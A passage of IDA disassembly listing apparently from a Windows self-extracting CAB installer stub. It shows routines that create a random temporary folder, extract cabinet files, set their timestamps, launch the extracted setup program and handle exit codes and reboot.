; ---------------------------------------------------------------------------
loc_1003888: ; CODE XREF: sub_100369E+1E0�j
cmp esi, [ebp+78h+var_18]
jb short loc_100389D
ja short loc_1003894
cmp eax, [ebp+78h+var_1C]
jbe short loc_100389D
loc_1003894: ; CODE XREF: sub_100369E+1EF�j
mov [ebp+78h+var_1C], eax
mov [ebp+78h+var_18], esi
mov [ebp+78h+var_1], cl
loc_100389D: ; CODE XREF: sub_100369E+18A�j
; sub_100369E+18E�j ...
inc [ebp+78h+RootPathName]
cmp [ebp+78h+RootPathName], 7Ah
jle loc_10037E7
mov eax, dword_1008018
cmp eax, 0CAB00EEEh
jz short loc_10038C4
xor ecx, ecx
cmp [ebp+78h+var_18], ecx
ja short loc_10038E4
jb short loc_10038C4
cmp [ebp+78h+var_1C], eax
jnb short loc_10038E4
loc_10038C4: ; CODE XREF: sub_100369E+216�j
; sub_100369E+21F�j
mov eax, [ebp+78h+var_28]
cmp [ebp+78h+var_18], eax
ja short loc_10038E4
jb short loc_10038D6
mov ecx, [ebp+78h+var_1C]
cmp ecx, [ebp+78h+var_2C]
jnb short loc_10038E4
loc_10038D6: ; CODE XREF: sub_100369E+22E�j
mov ecx, [ebp+78h+var_2C]
mov [ebp+78h+var_18], eax
mov al, [ebp+78h+var_9]
mov [ebp+78h+var_1C], ecx
jmp short loc_10038E7
; ---------------------------------------------------------------------------
loc_10038E4: ; CODE XREF: sub_100369E+21D�j
; sub_100369E+224�j ...
mov al, [ebp+78h+var_1]
loc_10038E7: ; CODE XREF: sub_100369E+244�j
push 0F0000000h ; dwFlags
push 1 ; dwProvType
push edi ; pszProvider
mov [ebp+78h+RootPathName], al
push edi ; pszContainer
lea eax, [ebp+78h+hProv]
push eax ; phProv
call ds:CryptAcquireContextA ; CryptAcquireContextA
test eax, eax
jz loc_10039BE
mov [ebp+78h+var_24], edi
mov dword ptr [ebp+78h+DeviceName], edi
mov edi, ds:sprintf
loc_1003911: ; CODE XREF: sub_100369E+308�j
lea eax, [ebp+78h+pbBuffer]
push eax ; pbBuffer
push 10h ; dwLen
push [ebp+78h+hProv] ; hProv
call ds:CryptGenRandom ; CryptGenRandom
test eax, eax
jz short loc_100396A
lea eax, [ebp+78h+RootPathName]
push eax
push offset aS ; "%s"
push ebx ; char *
call edi ; sprintf
xor ecx, ecx
mov cl, [ebp+78h+pbBuffer]
add esp, 0Ch
push 0
pop esi
and ecx, 7
add ecx, 9
mov [ebp+78h+var_28], ecx
jz short loc_100396A
lea ebx, Buffer[eax]
loc_100394C: ; CODE XREF: sub_100369E+2C5�j
movzx eax, [ebp+esi+78h+pbBuffer]
push eax
push offset a02x ; "%02x"
push ebx ; char *
call edi ; sprintf
add esp, 0Ch
inc esi
inc ebx
inc ebx
cmp esi, [ebp+78h+var_28]
jb short loc_100394C
mov ebx, offset Buffer
loc_100396A: ; CODE XREF: sub_100369E+284�j
; sub_100369E+2A6�j
cmp byte ptr Buffer, 0
jz short loc_1003989
xor esi, esi
inc esi
push esi ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10035EA
test eax, eax
jz short loc_1003990
mov [ebp+78h+var_14], esi
jmp short loc_1003990
; ---------------------------------------------------------------------------
loc_1003989: ; CODE XREF: sub_100369E+2D3�j
mov [ebp+78h+var_24], 1
loc_1003990: ; CODE XREF: sub_100369E+2E4�j
; sub_100369E+2E9�j
inc dword ptr [ebp+78h+DeviceName]
cmp [ebp+78h+var_14], 0
jnz short loc_10039AC
cmp [ebp+78h+var_24], 0
jnz short loc_10039AC
cmp dword ptr [ebp+78h+DeviceName], 2710h
jb loc_1003911
loc_10039AC: ; CODE XREF: sub_100369E+2F9�j
; sub_100369E+2FF�j
push 0 ; dwFlags
push [ebp+78h+hProv] ; hProv
call ds:CryptReleaseContext ; CryptReleaseContext
xor edi, edi
cmp [ebp+78h+var_14], edi
jnz short loc_1003A1C
loc_10039BE: ; CODE XREF: sub_100369E+261�j
push ebx
push offset aTempExt ; "temp\\ext"
lea eax, [ebp+78h+RootPathName]
push eax
call sub_100244B
mov esi, eax
lea eax, [ebp+78h+SystemTime]
push eax ; lpSystemTime
call ds:GetSystemTime ; GetSystemTime
lea eax, [ebp+78h+FileTime]
push eax ; lpFileTime
lea eax, [ebp+78h+SystemTime]
push eax ; lpSystemTime
call ds:SystemTimeToFileTime ; SystemTimeToFileTime
mov eax, [ebp+78h+FileTime.dwLowDateTime]
imul eax, dword_1008010
push esi
and eax, 0FFFFh
push eax
call sub_100250B
xor esi, esi
inc esi
push esi ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10035EA
test eax, eax
jnz short loc_1003A19
mov [ebp+78h+var_1C], edi
mov [ebp+78h+var_18], edi
jmp loc_10037B2
; ---------------------------------------------------------------------------
loc_1003A19: ; CODE XREF: sub_100369E+36E�j
mov [ebp+78h+var_14], esi
loc_1003A1C: ; CODE XREF: sub_100369E+120�j
; sub_100369E+31E�j
cmp dword_1018C20, edi
jnz loc_1003ABE
cmp dword_1008030, edi
jnz short loc_1003A46
mov eax, dword_1008010
push 3
pop ecx
mul ecx
cmp [ebp+78h+var_18], edx
ja short loc_1003ABE
jb short loc_1003A46
cmp [ebp+78h+var_1C], eax
jnb short loc_1003ABE
loc_1003A46: ; CODE XREF: sub_100369E+390�j
; sub_100369E+3A1�j ...
push edi ; dwInitParam
push offset DialogFunc ; lpDialogFunc
push hWnd ; hWndParent
push 6Bh ; lpTemplateName
push hInstance ; hInstance
call ds:DialogBoxParamA ; DialogBoxParamA
cmp eax, 0FFFFFFFFh
jz loc_100370D
cmp eax, edi
jz short loc_1003AB7
cmp byte ptr [eax], 0
jz short loc_1003AB7
mov ecx, eax
lea esi, [ecx+1]
loc_1003A77: ; CODE XREF: sub_100369E+3DE�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_1003A77
sub ecx, esi
inc ecx
cmp ecx, 104h
jnb short loc_1003AD2
mov edx, ebx
sub edx, eax
loc_1003A8D: ; CODE XREF: sub_100369E+3F7�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_1003A8D
push 0 ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10035EA
test eax, eax
jz short loc_1003AAD
mov [ebp+78h+var_14], 1
loc_1003AAD: ; CODE XREF: sub_100369E+406�j
cmp [ebp+78h+var_14], 0
jnz short loc_1003AD9
xor edi, edi
jmp short loc_1003A46
; ---------------------------------------------------------------------------
loc_1003AB7: ; CODE XREF: sub_100369E+3CD�j
; sub_100369E+3D2�j
push 4C7h
jmp short loc_1003AD4
; ---------------------------------------------------------------------------
loc_1003ABE: ; CODE XREF: sub_100369E+384�j
; sub_100369E+39F�j ...
cmp [ebp+78h+var_14], edi
jnz short loc_1003AD9
push 1 ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10035EA
test eax, eax
jnz short loc_1003AD9
loc_1003AD2: ; CODE XREF: sub_100369E+3E9�j
push 52h ; dwMessageId
loc_1003AD4: ; CODE XREF: sub_100369E+71�j
; sub_100369E+41E�j
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1003AD9: ; CODE XREF: sub_100369E+413�j
; sub_100369E+423�j ...
pop esi
loc_1003ADA: ; CODE XREF: sub_100369E+4E�j
pop edi
pop ebx
add ebp, 78h
leave
retn
sub_100369E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1003AE1 proc near ; DATA XREF: start_0+2E7�o
PathName = byte ptr -118h
FileTime = _FILETIME ptr -14h
CreationTime = FILETIME ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 118h
mov eax, [ebp+arg_0]
push esi
push edi
xor edi, edi
cmp eax, edi
jz loc_1003CC1
cmp eax, 2
jz loc_1003BE9
cmp eax, 3
jnz loc_1003CC1
mov esi, [ebp+arg_4]
lea eax, [ebp+FileTime]
push eax ; lpFileTime
xor eax, eax
mov ax, [esi+1Ah]
push eax ; wFatTime
xor eax, eax
mov ax, [esi+18h]
push eax ; wFatDate
call ds:DosDateTimeToFileTime ; DosDateTimeToFileTime
lea eax, [ebp+CreationTime]
push eax ; lpFileTime
lea eax, [ebp+FileTime]
push eax ; lpLocalFileTime
call ds:LocalFileTimeToFileTime ; LocalFileTimeToFileTime
lea eax, [ebp+CreationTime]
push eax ; lpLastWriteTime
lea eax, [ebp+CreationTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push dword ptr [esi+14h] ; hFile
call ds:SetFileTime ; SetFileTime
push dword ptr [esi+14h] ; hObject
call ds:CloseHandle ; CloseHandle
cmp dword_1008038, edi
mov hObject, edi
jnz short loc_1003B83
mov eax, hWnd
cmp eax, edi
jnz short loc_1003B73
loc_1003B69: ; CODE XREF: sub_1003AE1+142�j
push 4C7h
jmp loc_1003CBC
; ---------------------------------------------------------------------------
loc_1003B73: ; CODE XREF: sub_1003AE1+86�j
push edi ; lParam
push edi ; wParam
push 405h ; Msg
push 6Ah ; nIDDlgItem
push eax ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_1003B83: ; CODE XREF: sub_1003AE1+7D�j
cmp [esi], edi
jz short loc_1003BE1
push dword ptr [esi+4]
call sub_10030C7
mov dword_100876C, eax
lea eax, [ebp+PathName]
push eax
push dword ptr [esi+4]
push offset Buffer
call sub_100244B
mov esi, eax
jmp short loc_1003BB2
; ---------------------------------------------------------------------------
loc_1003BAC: ; CODE XREF: sub_1003AE1+D9�j
cmp byte ptr [esi], 5Ch
jz short loc_1003BBC
dec esi
loc_1003BB2: ; CODE XREF: sub_1003AE1+C9�j
lea eax, [ebp+PathName]
cmp esi, eax
ja short loc_1003BAC
loc_1003BBC: ; CODE XREF: sub_1003AE1+CE�j
lea eax, [ebp+PathName]
push eax
call sub_10030C7
mov dword_10088BC, eax
and byte ptr [esi], 0
lea eax, [ebp+PathName]
push eax
call sub_10030C7
mov lpCurrentDirectory, eax
loc_1003BE1: ; CODE XREF: sub_1003AE1+A4�j
xor eax, eax
inc eax
jmp loc_1003CC3
; ---------------------------------------------------------------------------
loc_1003BE9: ; CODE XREF: sub_1003AE1+1B�j
cmp dword_1008030, edi
mov esi, [ebp+arg_4]
jnz short loc_1003C14
cmp dword_1008768, edi
jnz short loc_1003C14
push offset aCdtag_1 ; "cdtag.1"
push dword ptr [esi+4] ; char *
call ds:strstr ; strstr
test eax, eax
pop ecx
pop ecx
jnz loc_1003CC1
loc_1003C14: ; CODE XREF: sub_1003AE1+111�j
; sub_1003AE1+119�j
cmp dword_1008038, edi
jnz short loc_1003C38
mov eax, hWnd
cmp eax, edi
jz loc_1003B69
push dword ptr [esi+4] ; lParam
push edi ; wParam
push 0Ch ; Msg
push 68h ; nIDDlgItem
push eax ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_1003C38: ; CODE XREF: sub_1003AE1+139�j
push ebx
lea eax, [ebp+PathName]
push eax
push dword ptr [esi+4]
push offset Buffer
call sub_100244B
mov esi, ds:CreateFileA
push edi
mov ebx, 80h
push ebx
push 2
push edi
mov [ebp+var_4], 1
mov edi, 40000000h
jmp short loc_1003C8A
; ---------------------------------------------------------------------------
loc_1003C6B: ; CODE XREF: sub_1003AE1+1BB�j
xor eax, eax
cmp [ebp+var_4], eax
jz short loc_1003CBA
push eax ; int
push eax ; lpSecurityAttributes
mov [ebp+var_4], eax
lea eax, [ebp+PathName]
push eax ; lpPathName
call sub_1003596
push 0 ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
loc_1003C8A: ; CODE XREF: sub_1003AE1+188�j
push 3 ; dwShareMode
lea eax, [ebp+PathName]
push edi ; dwDesiredAccess
push eax ; lpFileName
call esi ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_1003C6B
mov hObject, eax
lea eax, [ebp+PathName]
push eax
push offset off_1008000
call sub_1003571
mov eax, [ebp+arg_0]
pop ebx
jmp short loc_1003CC3
; ---------------------------------------------------------------------------
loc_1003CBA: ; CODE XREF: sub_1003AE1+18F�j
push 0FFFFFFFFh ; dwMessageId
loc_1003CBC: ; CODE XREF: sub_1003AE1+8D�j
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1003CC1: ; CODE XREF: sub_1003AE1+12�j
; sub_1003AE1+24�j ...
xor eax, eax
loc_1003CC3: ; CODE XREF: sub_1003AE1+103�j
; sub_1003AE1+1D7�j
pop edi
pop esi
leave
retn
sub_1003AE1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
start_0 proc near ; CODE XREF: start�j
var_88 = dword ptr -88h
uExitCode = dword ptr -84h
hFile = dword ptr -80h
ProcessInformation= _PROCESS_INFORMATION ptr -7Ch
ThreadId = dword ptr -6Ch
var_68 = byte ptr -68h
var_62 = word ptr -62h
var_50 = byte ptr -50h
StartupInfo = _STARTUPINFOA ptr -44h
sub esp, 88h
push ebx
push esi
push edi
push 0FFFFFFFFh ; dwSpinCount
xor ebx, ebx
mov esi, 80000000h
push offset CriticalSection ; lpCriticalSection
mov [esp+9Ch+uExitCode], ebx
mov dword_1008448, esi
call ds:InitializeCriticalSectionAndSpinCount ; InitializeCriticalSectionAndSpinCount
xor edi, edi
inc edi
mov dword_1008024, edi
call ds:InitCommonControls ; InitCommonControls
call ds:GetProcessHeap ; GetProcessHeap
mov hHeap, eax
call sub_10027B4
call sub_1003272
mov eax, lDistanceToMove
and eax, 0FFFF0000h
cmp eax, 0CAB00000h
jnz short loc_1003D2A
push 20000001h
jmp short loc_1003D86
; ---------------------------------------------------------------------------
loc_1003D2A: ; CODE XREF: start_0+5A�j
test lDistanceToMove, esi
jnz short loc_1003D38
mov dword_1008030, edi
loc_1003D38: ; CODE XREF: start_0+69�j
and byte ptr lDistanceToMove+3, 7Fh
push ebx ; lpName
push ebx ; bInitialState
push ebx ; bManualReset
push ebx ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
mov hEvent, eax
lea eax, [esp+94h+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call ds:CreateThread ; CreateThread
test eax, eax
jnz short loc_1003D6A
push 8
jmp short loc_1003D86
; ---------------------------------------------------------------------------
loc_1003D6A: ; CODE XREF: start_0+9D�j
push 0FFFFFFFFh ; dwMilliseconds
push hEvent ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
mov eax, hWnd
cmp eax, ebx
jnz short loc_1003D8B
push 4C7h ; dwMessageId
loc_1003D86: ; CODE XREF: start_0+61�j start_0+A1�j
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1003D8B: ; CODE XREF: start_0+B8�j
cmp dword_1008038, ebx
mov esi, ds:SendDlgItemMessageA
jz short loc_1003DC5
push 1F4h ; dwMilliseconds
call ds:Sleep ; Sleep
push ebx ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
push hWndNewParent ; hWndNewParent
push hWnd ; hWndChild
call ds:SetParent ; SetParent
jmp short loc_1003E05
; ---------------------------------------------------------------------------
loc_1003DC5: ; CODE XREF: start_0+D0�j
push lParam ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 68h ; nIDDlgItem
push eax ; hDlg
call esi ; SendDlgItemMessageA
mov eax, dword_1008010
add eax, 0FFFFh
shr eax, 10h
shl eax, 10h
push eax ; lParam
push ebx ; wParam
push 401h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push ebx ; lParam
push edi ; wParam
push 404h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
loc_1003E05: ; CODE XREF: start_0+FC�j
push ebp
push ebx
push ebx
push offset NumberOfBytesRead ; lpFileName
call sub_1002F1B
mov edi, dword_1008010
or [esp+0A4h+var_88], 0FFFFFFFFh
add esp, 0Ch
cmp edi, ebx
mov [esp+98h+hFile], eax
jz short loc_1003E7D
loc_1003E28: ; CODE XREF: start_0+1AE�j
mov eax, 10000h
cmp edi, eax
mov ebp, edi
jbe short loc_1003E35
mov ebp, eax
loc_1003E35: ; CODE XREF: start_0+16A�j
push ebp ; NumberOfBytesRead
push offset pSid ; lpBuffer
push [esp+0A0h+hFile] ; hFile
call sub_1002F5A
add esp, 0Ch
push ebp
push offset pSid
push [esp+0A0h+var_88]
call sub_10027DE
cmp dword_1008038, ebx
mov [esp+98h+var_88], eax
jnz short loc_1003E73
push ebx ; lParam
push ebx ; wParam
push 405h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
loc_1003E73: ; CODE XREF: start_0+199�j
sub edi, ebp
jnz short loc_1003E28
cmp [esp+98h+var_88], ebx
jz short loc_1003E87
loc_1003E7D: ; CODE XREF: start_0+15F�j
push 20000001h ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1003E87: ; CODE XREF: start_0+1B4�j
lea eax, [esp+98h+var_50]
push eax
push ebx
push offset sub_10024E0
push offset sub_10024C1
push offset sub_1002F82
push offset sub_1002F5A
push offset sub_1002F1B
push offset sub_10024AE
push offset sub_1002EFD
call sub_1004202
push ebx ; dwMoveMethod
push ebx ; lDistanceToMove
push [esp+0C4h+hFile] ; hFile
mov [esp+0C8h+var_88], eax
call sub_10024E0
lea eax, [esp+0C8h+var_68]
push eax
push [esp+0CCh+hFile]
push [esp+0D0h+var_88]
call sub_1004292
add esp, 3Ch
test eax, eax
jnz short loc_1003EE7
push 20000001h ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1003EE7: ; CODE XREF: start_0+214�j
cmp dword_1008038, ebx
jnz short loc_1003EFC
push ebx ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
loc_1003EFC: ; CODE XREF: start_0+226�j
call sub_100369E
cmp dword_1008038, ebx
mov edi, ds:LoadStringA
mov ebp, offset Caption
jnz loc_1003FAC
push 104h ; nBufferMax
push ebp ; lpBuffer
push 20000004h ; uID
push hInstance ; hInstance
call edi ; LoadStringA
push 104h ; nBufferMax
push offset FileName ; lpBuffer
push 20000006h ; uID
push hInstance ; hInstance
call edi ; LoadStringA
push ebp ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 65h ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push offset FileName ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 66h ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push offset Buffer ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 69h ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push ebx ; lParam
push ebx ; wParam
push 402h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
movzx eax, [esp+98h+var_62]
shl eax, 10h
push eax ; lParam
push ebx ; wParam
push 401h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push 5 ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
loc_1003FAC: ; CODE XREF: start_0+24B�j
push ebx
push ebx
push offset sub_1003AE1
push ebx
push offset dword_100219C
push offset NumberOfBytesRead
push [esp+0B0h+var_88]
call sub_1005170
add esp, 1Ch
test eax, eax
jnz short loc_1003FD8
push 20000001h ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1003FD8: ; CODE XREF: start_0+305�j
mov ecx, dword_1018C20
cmp ecx, ebx
mov eax, hWnd
jnz short loc_1003FF5
cmp eax, ebx
jnz short loc_1003FF5
push 4C7h ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1003FF5: ; CODE XREF: start_0+31E�j start_0+322�j
cmp dword_10088BC, ebx
jz loc_1004152
cmp dword_1008030, ebx
jnz loc_1004152
cmp dword_1008038, ebx
jnz short loc_1004023
push dword_100876C ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 68h ; nIDDlgItem
push eax ; hDlg
call esi ; SendDlgItemMessageA
loc_1004023: ; CODE XREF: start_0+34C�j
mov eax, dword_10088BC
mov esi, offset Value
mov edx, esi
sub edx, eax
loc_1004031: ; CODE XREF: start_0+372�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_1004031
push offset aUpdateUpdate_e ; "\\update\\update.exe"
push esi ; char *
call ds:strstr ; strstr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_100405B
push esi ; lpValue
push offset a_sfx_cab_exe_p ; "_SFX_CAB_EXE_PATH"
mov [eax], bl
call ds:SetEnvironmentVariableA ; SetEnvironmentVariableA
loc_100405B: ; CODE XREF: start_0+384�j
call sub_1002BF1
mov eax, dword_10088BC
mov edx, ebp
sub edx, eax
loc_1004069: ; CODE XREF: start_0+3AA�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_1004069
mov eax, dword_100802C
mov esi, eax
loc_100407A: ; CODE XREF: start_0+3B8�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_100407A
mov edi, ebp
sub eax, esi
dec edi
loc_1004086: ; CODE XREF: start_0+3C5�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_1004086
mov ecx, eax
shr ecx, 2
rep movsd
push 11h
mov ecx, eax
and ecx, 3
rep movsb
pop ecx
xor eax, eax
lea edi, [esp+98h+StartupInfo]
rep stosd
inc eax
mov [esp+98h+StartupInfo.dwFlags], eax
mov [esp+98h+StartupInfo.wShowWindow], ax
lea eax, [esp+98h+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [esp+9Ch+StartupInfo]
push eax ; lpStartupInfo
push lpCurrentDirectory ; lpCurrentDirectory
mov [esp+0A4h+StartupInfo.cb], 44h
push ebx ; lpEnvironment
push 20h ; dwCreationFlags
push ebx ; bInheritHandles
push ebx ; lpThreadAttributes
push ebx ; lpProcessAttributes
push ebp ; lpCommandLine
push ebx ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jnz short loc_10040E8
push 0FFFFFFFFh ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_10040E8: ; CODE XREF: start_0+418�j
cmp dword_1008038, ebx
jnz short loc_10040FD
push ebx ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
loc_10040FD: ; CODE XREF: start_0+427�j
mov eax, [esp+98h+ProcessInformation.hProcess]
push 0FFFFFFFFh ; dwMilliseconds
push eax ; hHandle
mov hProcess, eax
call ds:WaitForSingleObject ; WaitForSingleObject
lea eax, [esp+98h+uExitCode]
push eax ; lpExitCode
push [esp+9Ch+ProcessInformation.hProcess] ; hProcess
mov hProcess, ebx
call ds:GetExitCodeProcess ; GetExitCodeProcess
push [esp+98h+ProcessInformation.hProcess] ; hObject
mov esi, ds:CloseHandle
call esi ; CloseHandle
push [esp+98h+ProcessInformation.hThread] ; hObject
call esi ; CloseHandle
call sub_10023BC
cmp [esp+98h+uExitCode], 0CABF00D1h
jnz short loc_100414B
mov [esp+98h+uExitCode], ebx
jmp short loc_1004184
; ---------------------------------------------------------------------------
loc_100414B: ; CODE XREF: start_0+47C�j
call sub_10025BE
jmp short loc_1004184
; ---------------------------------------------------------------------------
loc_1004152: ; CODE XREF: start_0+334�j start_0+340�j
cmp ecx, ebx
jnz short loc_1004184
push ebx ; nCmdShow
push eax ; hWnd
call ds:ShowWindow ; ShowWindow
push 104h ; nBufferMax
push ebp ; lpBuffer
push 20000002h ; uID
push hInstance ; hInstance
call edi ; LoadStringA
push 10030h ; uType
push ebp ; lpCaption
push ebp ; lpText
push hWnd ; hWnd
call ds:MessageBoxA ; MessageBoxA
loc_1004184: ; CODE XREF: start_0+482�j start_0+489�j ...
mov eax, dword_1008448
test eax, eax
js short loc_10041D9
mov esi, 40000000h
test eax, esi
jnz short loc_10041CF
push dword_100844C ; int
mov ecx, eax
shr ecx, 4
and ecx, 1
push offset dword_1008450 ; int
push ecx ; hLibModule
mov ecx, eax
shr ecx, 1
and ecx, 1
push ecx ; bForceAppsClosed
and eax, 1
push eax ; bRebootAfterShutdown
call sub_1002D83
test eax, eax
mov eax, dword_1008448
jnz short loc_10041CB
or eax, esi
mov dword_1008448, eax
loc_10041CB: ; CODE XREF: start_0+4FB�j
test eax, esi
jz short loc_10041D9
loc_10041CF: ; CODE XREF: start_0+4CD�j
push 20000007h ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_10041D9: ; CODE XREF: start_0+4C4�j start_0+506�j
cmp dword_1008024, ebx
jz short loc_10041F2
push offset CriticalSection ; lpCriticalSection
call ds:DeleteCriticalSection
mov dword_1008024, ebx
loc_10041F2: ; CODE XREF: start_0+518�j
push [esp+98h+uExitCode] ; uExitCode
call ds:ExitProcess ; ExitProcess
start_0 endp
; ---------------------------------------------------------------------------
db 0CCh
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004202 proc near ; CODE XREF: start_0+1E9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 804h
call esi
pop ecx
xor ecx, ecx
cmp eax, ecx
jnz short loc_1004226
push ecx
push 5
push [ebp+arg_20]
call sub_1005350
xor eax, eax
jmp short loc_100428F
; ---------------------------------------------------------------------------
loc_1004226: ; CODE XREF: sub_1004202+13�j
mov edx, [ebp+arg_4]
or dword ptr [eax+88h], 0FFFFFFFFh
or dword ptr [eax+84h], 0FFFFFFFFh
mov [eax+4], edx
mov edx, [ebp+arg_8]
mov [eax+0Ch], edx
mov edx, [ebp+arg_C]
mov [eax+10h], edx
mov edx, [ebp+arg_10]
mov [eax+14h], edx
mov edx, [ebp+arg_14]
mov [eax+18h], edx
mov edx, [ebp+arg_18]
mov [eax+1Ch], edx
mov edx, [ebp+arg_1C]
mov [eax+20h], edx
mov edx, [ebp+arg_20]
mov [eax+48h], ecx
mov [eax+44h], ecx
mov [eax+4Ch], ecx
mov ecx, 0FFFFh
mov [eax+8], esi
mov [eax], edx
mov word ptr [eax+0B2h], 0Fh
mov [eax+0A0h], ecx
mov [eax+0A8h], ecx
mov [eax+0A4h], ecx
loc_100428F: ; CODE XREF: sub_1004202+22�j
pop esi
pop ebp
retn
sub_1004202 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1004292 proc near ; CODE XREF: start_0+20A�p
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
mov esi, [ebp+arg_0]
push 24h
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
call dword ptr [esi+10h]
add esp, 0Ch
cmp eax, 24h
jnz short loc_10042CF
cmp [ebp+var_24], 4643534Dh
jnz short loc_10042CF
cmp [ebp+var_C], 103h
jz short loc_10042D3
movzx eax, [ebp+var_C]
push eax
push 3
push dword ptr [esi]
call sub_1005350
loc_10042CF: ; CODE XREF: sub_1004292+1C�j
; sub_1004292+25�j
xor eax, eax
jmp short loc_100431B
; ---------------------------------------------------------------------------
loc_10042D3: ; CODE XREF: sub_1004292+2D�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_1C]
mov [eax], ecx
mov cx, [ebp+var_A]
mov [eax+4], cx
mov cx, [ebp+var_8]
mov [eax+6], cx
mov cx, [ebp+var_4]
mov [eax+8], cx
mov cx, [ebp+var_2]
mov [eax+0Ah], cx
movzx ecx, [ebp+var_6]
mov edx, ecx
shr edx, 2
and edx, 1
mov [eax+0Ch], edx
mov edx, ecx
and edx, 1
and ecx, 2
mov [eax+10h], edx
mov [eax+14h], ecx
xor eax, eax
inc eax
loc_100431B: ; CODE XREF: sub_1004292+3F�j
pop esi
leave
retn
sub_1004292 endp
; =============== S U B R O U T I N E =======================================
sub_100431E proc near ; CODE XREF: sub_10049B0+2A3�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
lea eax, [esi+7BCh]
lea ecx, [esi+3B7h]
mov [eax+4], ecx
lea ecx, [esi+4B8h]
mov [eax+8], ecx
lea ecx, [esi+5B9h]
mov [eax+0Ch], ecx
mov ecx, [esi+38h]
mov [eax+10h], ecx
mov cx, [esi+70h]
push edi
mov [eax+1Eh], cx
mov cx, [esi+72h]
push eax
xor ebx, ebx
push ebx
lea edi, [esi+7E4h]
mov [eax+20h], cx
call dword ptr [esi+24h]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_10043A7
cmp [esi+28h], ebx
jz short loc_10043B5
mov [edi], ebx
mov eax, [esi+38h]
mov [edi+4], eax
mov eax, [esi+4Ch]
mov [edi+8], eax
mov ax, [esi+0A0h]
mov [edi+0Ch], ax
mov ax, [esi+70h]
mov [edi+0Eh], ax
